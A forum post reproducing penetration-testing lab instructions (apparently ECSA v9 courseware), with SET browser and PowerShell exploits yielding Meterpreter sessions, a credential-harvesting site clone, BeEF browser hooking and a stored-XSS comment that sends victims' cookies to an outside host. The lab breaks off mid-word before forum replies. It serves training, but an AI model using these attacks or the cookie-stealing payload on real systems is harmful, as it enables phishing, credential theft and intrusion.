Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Website Attack Vectors
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Choose Metasploit Browser Exploit Method
In the next menu that appears, type 2 and press Enter to choose Metasploit Browser Exploit Method.
8. Create a Cloned Website
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. NAT/PORT Forwarding
Type no and press Enter, since you are not using NAT/PORT Forwarding.
10. IP Address for Reverse Connection
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for reverse connection, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
11. Create a Cloned Website
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used http://www.xsecurity.com. This will initiate the cloning of the specified website.
12. Choose a Browser Exploit
Choose a Browser Exploit with which you want to exploit the vulnerable target. In this lab, the exploit used is Java Applet JMX Remote Code Execution (Updated 213-01-19).
As the Exploit's index number is 1, type 1 and press Enter.
13. Choose a Payload
Choose a payload with which you want to exploit the vulnerable target. In this lab, the payload used is Windows Meterpreter Reverse DNS.
As the payload's index number is10, type 10 and press Enter.
14. Choose the Default Port Number
Simply press Enter to choose the default port number.
15. Browser Exploit Initiated
SET now initiates payload handler.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6:8080) through mail or any other means.
In real-time, when a victim clicks the link, the payload will be executed and the attacking machine gains connection with the victim machine.
The Victim machine used in this lab is Accounts Department Subnet D.
16. Logon to Accounts Department Subnet D
Select Accounts Department Subnet D from the Machines pane and log in to it.
17. Browse the Cloned Website
Launch Google Chrome web browser, type the URL http://10.10.10.6:8080 in the address bar and press Enter.
As soon as you press Enter, a notification appears saying JAVA was blocked. Click Run this time.
18. Session Established
As soon as you click Run, meterpreter session is established in Kali Linux machine. Type sessions -i 1 and press Enter to interact with meterpeter session 1.
19. Generate a Report
As you can't generate a report in such case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
20. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
21. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as Browser_exploit_meterpreter, the root/ Home folder location has been chosen to save the file.
22. Screenshot Saved
The screenshot has been saved to the home folder as shown in the followig screenshot:
In this lab, you have learned how to:
• Generate a Browser Exploit
• Perform Penetration Testing on the Vulnerable Machine

Penetration Testing a Machine Using Powershell Attack Vectors
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by Preventative Technologies.
The objective of this lab is to help student learn how to:
• Generate Powershell Exploits
• Perform Penetration Testing on a Machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Powershell Attack Vectors
A list of menus in Social-Engineering Attacks will appear, type 10 and press Enter to choose Powershell Attack Vectors.
7. Choose Powershell Alphanumeric Shellcode Injector
In the next menu that appears, type 1 and press Enter to choose Powershell Alphanumeric Shellcode Injector.
8. IP Address for Payload Listener
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for payload listener, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
9. Choose the Default Port Number
Simply press Enter to choose the default port number.
10. Start the Listener
You need to start the payload listener. So type yes and press Enter. This will initiate the payload listener.
11. Payload Handler Initiated
SET now initiates payload handler.
Now, configure the payload and send it through mail or any other means.
In real-time, when a victim executes the payload the attacking machine gains connection with the victim machine.
12. Copy the Payload to Desktop
Open a new command line terminal, type the command cd /root/.set/reports/powershell and press Enter. This will change the pwd (present working directory) from root to /root/.set/reports/powershell.
13. Copy the Payload to Desktop (Cont'd)
Issue the command cp x86_powershell_injection.txt ~/Desktop and press Enter. This copies the file x86_powershell_injection.txt onto Desktop.
14. Change the File Format to bat
The text file is now saved to Desktop. You need to change the file format from .txt to .bat. For this, you need to simply replace .txt with .bat.
15. Share the Payload File
Type the command cp /root/Desktop/x86_powershell_injection.bat /var/www/share and press Enter. This copies the file to share folder.
In real-time, attackers share this file with the victim by sending the file through mail, shared network drives or any other medium. As soon as the victim executes the file, the attacking machine establishes connection with the victim machine.
16. Start Apache Service
Launch a new command line terminal, type the command service apache2 start and press Enter. This will begin the apache server, which allows you to share the file with other devices inside/outside the network.
17. Logon to Database Server Subnet B
Select Database Server Subnet B from Machines pane, log in to it and close the Server Manager window.
18. Download the Payload
Launch Mozilla web browser, type the URL http://10.10.10.6/share and press Enter.
A webpage appears displaying the payload. Click the link x86_powershell_injection.bat in order to download the payload.
19. Download the Payload (Cont'd)
Opening x86_powershell_injection.bat pop-up appears, click Save File button to save the payload on the machine.
20. Execute the Payload
The payload is saved to the location C:\Users\Administrator\Downloads by default. Navigate to the location and double-click x86_powershell_injection.bat.
An Open File - Security Warning pop-up appears, click Run in order to execute the payload.
21. Payload Executed Successfully
As soon as you click Run, a windows shell opens and random text scrolls in it for a fraction of second and the shell closes automatically. Now, the payload is successfully executed.
22. Meterpreter Session Established
As soon as you click Run, a meterpreter sessions will be opened. Type Sessions -i 1 command and press Enter. This will establish the meterpreter session as shown in the following screenshot:
23. Obtain the System Information
Type the command sysinfo and press Enter. This returns the OS related information of the target machine as shown in the following screenshot:
24. Generate a Report
As you can't generate a report in such case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
25. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
26. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as powershell_meterpreter.
the root/ Home folder location has been chosen to save the file.
27. Screenshot Saved
The screenshot has been saved to the home folder as shown in the followig screenshot:
In this lab, you have learned how to:
• Generate Powershell Exploits
• Perform Penetration Testing on a Machine

Penetration Testing Vulnerable Machines and Creaing a Botnet
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
The objective of this lab is to help students learn how to:
• Use the Browser Exploitation Framework (BeEF)
• Attain Credentials of a user account in plain text
• Establish a botnet of vulnerable machines
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Create a Cloned Website
You will be presented with a social engineering toolkit menu.
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Create a Cloned Website (Cont'd)
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Create a Cloned Website (Cont'd)
In the next menu that appears, type 3 and press Enter to choose Credential Harvester Attack Method.
8. Create a Cloned Website (Cont'd)
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. Create a Cloned Website (Cont'd)
Type the IP address of Kali Linux machine in the prompt for “IP address for the POST back in Harvester/Tabnabbing”and press Enter. In this lab, the IP address is 10.10.10.6.
10. Create a Cloned Website (Cont'd)
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used moviescope.xsecurity.com.
By entering the credentials, SET will initiate the cloning of the specified website.
moviescope.xsecurity.com is an other service of http://www.xsecurity.com.
11. Website Cloned Successfully
SET has successfully cloned the website.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, he/she will be redirected to the cloned website. Whatever the victim types in the login or any other text fields associated to the cloned website, they will be captured by SET and displayed on the SET screen.
12. Logon to Advertisement Dept. Subnet D Machine
Select Advertisement Dept. Subnet D from the Machines pane and log in to the Administrator account of the machine.
13. Browse the Cloned Website
Launch Mozilla Firefox or any other web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you enter the URL, you will be displayed with a cloned webpage as shown in the following screenshot:
14. Log in to the Cloned Website
The cloned website appears on the browser. Assume that you are a user in the moviescope and you have access to the webpage.
Log in to the website using the following credentials:
Username: kety
Password: test
15. moviescope Legitimate Home Page
As soon as you click Login button, you wont be able to login; instead, you will be redirected to the legitimate home/login page of moviescope. You will be able to recognize this by observing the URL in the address bar.
In the mean while, SET running on Kali Linux machine harvests the credentials.
16. Credentials Harvested Successfully
Switch to Kali Linux Subnet A machine by selecting it from the Machines pane.
You will be able to view the harvested credentials as shown in the following screenshot:
It is evident that the passwords are retrieved in plain text.
17. Log in to moviescope
Now, launch a web browser and use these credentials to log in to moviescope.
18. User Successfully Logged In
You are successfully logged in to the web application as shown in the following screenshot:
19. Launch a New Command Line Terminal
Minimize the webpage and launch a new command line terminal.
20. Change the Working Directory
Type the command cd /usr/share/beef-xss and press Enter. This changes the present working directory from root to beef-xss.
21. Launch beef
Type the command ./beef and press Enter. This launches browser exploitation framework (BeEF).
To Access to BeEf UI, note the link http://10.10.10.6:3000/ui/panel.
You will have to access this page in a web browser and log in to it.
22. Access the BeEF Web Application
Launch Iceweasel web browser, paste the URL in the address bar and press Enter.
BeEF login page appears on the browser. Enter the following credentials to log in to the web application:
Username: beef
Password: beef
23. Copy the Link Location
The BeEF home page appears on the browser window. Under the Getting Started section, you will observe two "here" links.
Right-click the first here link and select Copy Link Location.
Now, you need to paste the link in the Blog page of moviescope website.
24. Paste the Link
Maximize the browser window in which you have logged in to moviescope. Click on Blog tab.
25. Paste the Link (Cont'd)
Blog page appears; scroll down to Leave a Comment section,paste the link in the Comment field and click Submit Comment.
26. Link Successfully Submitted
A comment link is posted on the page. Now, log in to the website from other machines and open the URL. As soon as you open the webpage, the browser exploitation framework running in this machine (Kali Linux Subnet A) attains connection with the machine. This way, a botnet will be created.

27. Open the Link from Database Server Subnet B
Log in to Database Server Subnet B and close the Server Manager window.
Launch firefox web browser and log in to moviescope.xsecurity.com using the following credentials:
Username: John
Password: Test
Assume that you are a user named John.
28. Click on Blog Tab
You are logged in to the website. Click on Blog tab:
29. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
30. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
31. Open the Link from Active Directory Subnet C
Select Active Directory Subnet C from the Machines pane, log in to it and close the Server Manager window.
Log in to moviescope.xsecurity.com using the following credentials:
Username: sam
Password: test
Here, you are logging into the website as a user named Sam.
32. Click on Blog Tab
You are logged in to the website. Click on Blog tab:
33. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
34. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
35. Open the Link from Accounts Dept Subnet D
Select Accounts Dept Subnet D from the Machines pane, and log in to it.
Log in to moviescope.xsecurity.com using the following credentials:
Username: steve
Password: test
Here, you are logging into the website as a user named Steve.
36. Click on Blog Tab
You are logged in to the website. Click on Blog tab.
37. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
38. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
39. Switch to Kali Linux Subnet A Machine
Select Kali Linux Subnet A from the Machines pane and maximize the browser in which you are logged in to BeEF.
40. Observe the Logs
Click on Logs tab. You will observe that all the three machines Database Server Subnet B, Active Directory Subnet C and Accounts Dept Subnet D are connected to the Browser Exploitation Framework (BeEF) by observing the logs.
You can observe them even in the left pane under 10.10.10.6 directory (under Online Browsers).
41. Generate a Report
As you cant generate a report in this case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
42. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
43. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as Botnet_BeEF.
the root/ Home folder location has been chosen to save the file.
44. Screenshot Saved
The screenshot has been saved to the home folder as shown in the followig screenshot:
In the same way, click on each victim machine's IP address, take a screenshot of each of them and place the screenshots in the pentesting folder.
In this lab, you have learned how to:
• Use the Browser Exploitation Framework (BeEF)
• Attain Credentials of a user account in plain text
• Establish a botnet of vulnerable machines

Penetration Testing a Website for Stored XSS Vulnerability
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored Cross-Site scripting attacks are persistent attacks which are implanted on the target server unless its existence is detected and removed. When an employee in an organization unknowingly becomes victim to this script, attackers gain the session ID corresponding to the victim, and thereby attaining the victim's session without legitimately logging in to the web application. As an Ethical hacker or a Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect the user sessions from being stolen.
The objective of this lab is to help students learn how to:
• Test web applications for vulnerabilities
• Use Firebug to hijack a session
1. Logon to Windows 8
Select Windows 8 Subnet A from the Machines pane. Go to Commands and click Ctrl + Alt + Delete.
2. Enter the Credentials
In the log in window, enter the following Credentials and press Enter:
User Name: Student
Password: Pa$$w0rd
3. Log In to moviescope Website
Launch Firefox web browser, type the URL http://moviescope.xsecurity.com in the address bar and press Enter.
moviescope login/home page appears as shown in the following screenshot:
4. Log In to moviescope Website (Cont'd)
Log in to MovieScope assuming that you are a user. Use the following credentials to log in to the website:
Username: steve
Password: test
5. Click on Blog Tab
You are logged in as a general user and note that you do not have any admin privileges. Click on Blog tab.
6. Enter the Malicious Script
Blog page appears; scroll down to Leave a Comment section, enter the following query in the Comment field and click Submit Comment.
<a onclick="document.location='http://10.10.10.3/oceanplaza/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>
7. Script Successfully Submitted
A comment link is posted stating “Please click here to visit website” (as we have stated this comment in the query posted in the previous task).
Now, whenever a user who has logged in to the website visits this webpage (Blog webpage) and clicks on the link, the malicious script running behind the link gets activated, and immediately the cookie value is stored in a file named Mycookies.txt in the location C:\inetpub\wwwroot\oceanplaza\CookieSteal.
8. Log on to Web Server Subnet C
Log on to Web Server Subnet C machine's Administrator account.
9. Close the Server Manager Window
Click on Close button at the top right corner of the Server Manager window.
10. Log in to moviescope
Launch Firefox browser, type the URL http://moviescope.xsecurity.com in the address bar and press Enter.
moviescope login/home page appears as shown in the following screenshot:
11. Log in to moviescope (Cont'd)
Assume that you are the admin user and log in to the website using the following credentials:
Username: sam
Password: test
12. Click on Blog Tab
You are logged in as an admin user and you can observe that the webpage displays your role (Admin) adjacent to Logout. Click on Blog tab:
13. Click the Malicious Link
Blog webpage appears on the browser window. Scroll down the page and click Please click here to visit website link.
14. Cookie Stealing Attack Performed
The admin (victim) is redirected to oceanplaza website’s Default.aspx webpage. Click here link.
In real-time, seeing the blank/unavailable webpage, he/she clicks here link to go back to the previous page, being unaware of the fact that an attack has been performed to steal the cookie.
15. moviescope Blog Webpage
You will be redirected to moviescope's Blog webpage as shown in the following screenshot:
Do not log out of the website as long as you perform this lab.
16. Launch Windows 8 Subnet A
Select Windows 8 Subnet A machine from the Mach

Using the hide tag
[ hide ][ url=http://labmentor.net]name description[ /url ][ /hide]

Example:
With http://labmentor.net is link upload.
Find all posts by this user
Quote this message in a reply
 Thanks given by: apple101 , simburel
09-21-2017, 12:08 AM (This post was last modified: 09-21-2017 12:10 AM by simburel.)
Post: #3
RE: ECSA v9 Labs
Many thanks to you for sharing this!

Is anyone who can provide ECSAv9 lab challenges? A brief description of the challenge, and what was the solution. I mean, challenges which goes as lab exam at the end of the course. Many thanks
Find all posts by this user
Quote this message in a reply
09-23-2017, 12:56 AM
Post: #4
RE: ECSA v9 Labs
How about lab challenges, thanks
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)